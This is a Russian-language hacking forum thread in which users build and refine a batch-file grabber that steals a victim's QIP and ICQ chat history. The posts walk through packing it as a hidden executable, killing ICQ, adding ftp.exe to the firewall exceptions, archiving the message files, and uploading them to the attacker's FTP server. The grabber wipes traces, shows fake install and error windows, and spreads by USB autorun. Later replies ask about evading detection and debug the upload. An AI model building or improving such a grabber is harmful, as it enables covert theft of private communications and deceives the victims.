![]() |
[EasyHack] Крадем историю QIP и ICQ
вот сделал батник тут недавно, впринципе делал ради одной жертвы, но непригодился в последующем...
был бы очень рад каким нибудь дополнениям к нему и усовершенствованиям. также интересует аспект палевности данного батника, хотел бы узнать где он может запалится и на чем если что. Код:
@echo offКод:
o tvoi.ftp.comкак? 1) как главный файл для компиляции выбираем тело граббера 2) настраиваем: Invisible Application, Temporary Directory, Delete At Exit, Overwrite Existing Files 3) на вкладке Include добавляем (Add) файлы : наш фтп сервер (допустим ftpserv.cmd) и прогу для архивации истории и папок квипа - zip32.exe 4) на вкладке Versioninformations добавляем иконку дистрибутива 5) нажимаем Compile 6) готово как все это работает? после запуска нашего экзешника в %temp% распакуется 3 файла - тело граббера, фтп сервачок, прога для архивации (консольная) - zip32.exe. все эти файлы будут скрыты - как "скрытый" и "системный". дальше убиваем процесс ICQ.ехе - иначе скопировать файлы истории аськи невозможно. добавляем в исключения вин-файрволла прогу ftp.exe - стандартный фтп клиент для виндовозов. создаем папку для копии нашей истории - c:\windows\dump_rep. создаем файл на VBS - простое окно с текстом, якобы установки проги "The Middler" - уж что это за прога итд - тут зависит от вашей фантазии. делаем паузу в 10 секунд, чтобы все операции были окончательно завершены. копируем файл истории жертвы из ICQ в нашу папку dump_rep. архивируем один из возможных путей истории квипа - папку C:\Program Files\QIP\Users. перемещаем ее тоже в папку dump_rep. пробуем тоже самое с %USERPROFILE%\Application Data\QIP\Profiles открываем фтп сервер, который заливает на наш фтп данные файлы. убираем аттрибуты "скрытый" и "системный" с наших файлов и удаляем их. запускаем очередное обаманное окно при помощи VBS - мол при установке проги "The Middler" произошла ошибка 1251. качаем: Bat To Exe Converter v1.5 zip32.exe Setup.ico P.S. незаываем написать ICQ номер жертвы вот тут: Код:
@copy "%USERPROFILE%\Application Data\ICQ\NOMER_TUT\Messages.mdb"авторан с флехи: Код:
[autorun] Тестированно на winlogon.exe |
1\ %USERPROFILE%\Application Data\ = %APPDATA% --> упрощаем код, вес
2\ инфа не обязательно в %APPDATA%, может QIP ставили для всех пользователей ?) т.е. в %ALLUSERSPROFILE%\Application Data\ ;) 3\ QIP 2005 могли и не в Program Files установить + винда не обязательно на диске C, но я сам хз, как это лучше сделать, ну как минимум %ProgramFiles%\QIP\ а насчёт палевности: допустим запускаем мы его с флэшки: 1\ авторан: Код:
[autorun] 2\дописываем в конец батника start .. |
Цитата:
|
Цитата:
+ это тоже |
Цитата:
|
Цитата:
в этом случае вообще тока поиск по реестру поможет :( |
Цитата:
|
Цитата:
реализация сложная, но видимо возможна, должно быть что-то типа: <вывод нужной строки из reg, regedit> --> дальше по конвееру |find <нужное> --> задание это переменной --> юзаем reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Un install\Qip Infium" /v installlocation - вывод директории, куда установили... |
дамп создает, но на фтп не отправляет, в чем может быть дело? (специально создал файл dump_ICQ.bin в папке C:\WINDOWS\dump_rep весом 1 кб). запускаю приложение (формат .cmd) сервера в котором у меня прописано
PHP код:
|
napishi v konce tela batnika:
cmd /k potom zapusti uvidish gde oshibka |
| Время: 11:04 |